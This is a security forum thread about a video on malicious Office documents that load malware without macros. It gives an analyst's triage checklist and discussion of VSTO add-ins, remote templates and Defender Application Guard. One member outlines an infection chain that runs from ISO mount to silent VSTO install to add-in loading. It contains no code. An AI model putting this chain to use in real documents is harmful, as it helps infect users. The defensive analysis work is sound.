Malware Analysis [Video] Malicious MS Office Files Without Macros

[struppigel]

Some people believe that MS Office Macros are the only way to run malicious code in office files, so files without them are safe.
I also heard ".docx are just a bunch of XML, so it can't do anything bad."

Both statements are wrong. We take a look at two techniques that load malware without Macros in the following video. I also provide a checklist that analysts can use to make sure a file is really clean.

Samples are available on Trainings Samples

For those of you who just want the checklist, here it is. It is designed such that even new malware loading techniques shouldn't be missed that easily:

• Open in MS Office and check content for social engineering and phishing, often it tells you what to enable or where to click
• ️Does the sample show interesting behavior in a sandbox?
• ️Is the metadata consistent? If it looks suspicious, take extra time to analyze it
• ️Extract IPs, URLs, emails and other plaintext indicators, e.g., using regex or binary refinery
• ️For non-text formats: Roughly check the file in a hex editor and create a strings listing, watch out for embedded files and anything that stands out
• ️Scan with a Yara rule set, start with Yara-Forge if you don't have your own, add detections for new techniques there
• ️Check for Macros, VBA Stomping, VSTO Add-ins, External Templates

 

[Bot]

Some people believe that MS Office Macros are the only way to run malicious code in office files, so files without them are safe.
I also heard ".docx are just a bunch of XML, so it can't do anything bad."

Both statements are wrong. We take a look at two techniques that load malware without Macros in the following video. I also provide a checklist that analysts can use to make sure a file is really clean.

Samples are available on Trainings Samples

For those of you who just want the checklist, here it is. It is designed such that even new malware loading techniques shouldn't be missed that easily:

• Open in MS Office and check content for social engineering and phishing, often it tells you what to enable or where to click
• ️Does the sample show interesting behavior in a sandbox?
• ️Is the metadata consistent? If it looks suspicious, take extra time to analyze it
• ️Extract IPs, URLs, emails and other plaintext indicators, e.g., using regex or binary refinery
• ️For non-text formats: Roughly check the file in a hex editor and create a strings listing, watch out for embedded files and anything that stands out
• ️Scan with a Yara rule set, start with Yara-Forge if you don't have your own, add detections for new techniques there
• ️Check for Macros, VBA Stomping, VSTO Add-ins, External Templates

Good post. Those two assumptions are definitely unsafe.

A .docx file is usually an Open XML container with XML parts, but that does not mean it is harmless. “Just XML” only describes the file structure, not the full attack surface around how Office processes relationships, external references, templates, embedded content, and other document features.

Why “no macros = safe” is wrong

• Office documents can still be used for phishing, credential capture, or malware delivery without VBA macros.
• Some techniques rely on Office features outside classic macros, such as remote templates, embedded objects, links, add-ins, or other document components.
• Even when direct code execution is not present, a document can still be malicious in the broader sense if it tricks the user into opening a payload, visiting a hostile URL, or disclosing credentials.

Why “.docx is only XML” is also misleading

• .docx files are ZIP-based containers with multiple internal parts, relationships, and metadata.
• Those relationships can reference internal or external resources.
• The security risk often comes from how Office interprets the package, not from XML being “executable” by itself.
• Attackers also abuse embedded files, remote content, and user interaction prompts rather than relying only on scriptable code.

Your checklist is solid, especially for triage

The strongest part is that it does not stop at “macro present or not.” That is the right mindset.

A few points I would especially emphasize:

• User-facing content matters. Social engineering text is often the main payload delivery mechanism.
• Metadata and relationships are worth checking closely, especially external references.
• Strings, indicators, and embedded content review can reveal a lot before deeper reversing starts.
• YARA is useful for scale, but it should support analysis rather than replace it.
• Sandboxing can help, although Office behavior may depend heavily on prompts, network access, version differences, and protected view conditions.

One important nuance

It is best not to frame a document as “clean” solely because no obvious active content was found. In practice, a document is only “clean” to the extent that the analysis covered the relevant features and no suspicious behavior or delivery mechanism was identified. That distinction matters because Office has a long history of feature abuse beyond straightforward macro execution.

Practical takeaway

• Treat macro checks as only one part of document analysis.
• Inspect structure, relationships, embedded objects, indicators, and user-deception content.
• Use dynamic testing carefully, because document behavior can vary by environment.
• If certainty is required, combine static review, controlled detonation, and community or peer validation.

The main takeaway is simple: absence of macros does not equal safety, and a .docx being XML-based does not make it harmless.

 

[Parkinsond]

Even with add-ins disabled in Office settings and internet to Office components is blocked by firewall?

 

[Victor M]

Even with add-ins disabled in Office settings and internet to Office components is blocked by firewall?

The video is quite informative. It includes a sample of docx .net (I think) to reference an iso included in the zip bundle. (the iso contains the malicious dll)

 

[Parkinsond]

The video is quite informative. It includes a sample of docx .net (I think) to reference an iso included in the zip bundle. (the iso contains the malicious dll)

Why deal with iso?! I should just download a docx file?

 

[Victor M]

Why deal with iso?! I should just download a docx file

Some people would distribute zip files. You are wise to question why.

 

[Trident]

Some people believe that MS Office Macros are the only way to run malicious code in office files, so files without them are safe.
I also heard ".docx are just a bunch of XML, so it can't do anything bad."

Both statements are wrong. We take a look at two techniques that load malware without Macros in the following video. I also provide a checklist that analysts can use to make sure a file is really clean.

I am not sure who are the people saying that…?

How the macro is stored is not important, it allows file creation, internet access (including but not limited to APIs and so on), parsers, LOLBin spawning and so on.

You can achieve a lot that other languages (C++, .net and so on allow), with the only difference that VBA is single threaded (though this as well can be mitigated if needed).

 

[Parkinsond]

Some people would distribute zip files. You are wise to question why.

Extract zip file, copy docx file to a new folder, scan, launch.

 

[Victor M]

Extract zip file, copy docx file to a new folder, scan, launch.

The video also mentions referencing internet based files.Watch the video its not long. I am terrible at paraphrasing things.

 

[Parkinsond]

The video also mentions referencing internet based files.Watch the video its not long. I am terrible at paraphrasing things.

I have watched it; unfortunately, not all people with knowledge are eligible for teaching.

 

[Victor M]

not all people with knowledge are eligible for teaching.

me included

 

[Andy Ful]

I think running VSTO add-ins requires the VSTO runtime to be installed first.

User mounts ISO
↓
setup.exe runs (manually or via autorun)
↓
VSTO runtime installer runs silently
↓
DOCX document opens automatically
↓
Office loads the VSTO add-in

 

[Parkinsond]

Office loads the VSTO add-in

Even if add-ins is disabled in settings?

 

[Parkinsond]

me included

No, I like your posts.

 

[RoboMan]

Doesn't Defender Application Guard sandbox documents upon execution?

 

[Andy Ful]

Even if add-ins is disabled in settings?

Disabling add-ins can block the attack.

 

[Andy Ful]

Doesn't Defender Application Guard sandbox documents upon execution?

If I recall correctly, this can work only for files with MotW and located in insecure locations.
So, if the VSTO run time is already installed, the document with MotW will be opened with MDAG (add-in fails). Documents with no MotW will be opened normally.

 

[struppigel]

Even with add-ins disabled in Office settings and internet to Office components is blocked by firewall?

Why is this relevant for malware analysis? To determine if something is malicious or not, it does not matter if it is blocked. It's still malicious.

I have watched it; unfortunately, not all people with knowledge are eligible for teaching.

Would you care to tell me what I can improve?

 

[Parkinsond]

Why is this relevant for malware analysis? To determine if something is malicious or not, it does not matter if it is blocked. It's still malicious.

As a home user, I care more how to get infected rather than the sample is malicious or not?

Would you care to tell me what I can improve?

Educating non-porfessionals in field visists requirment is completely different than lecturing fellow physicians.

 

[struppigel]

As a home user, I care more how to get infected rather than the sample is malicious or not?

Educating non-porfessionals in field visists requirment is completely different than lecturing fellow physicians.

I agree with both, the channel is not for home users but for professional and hobby malware analysts.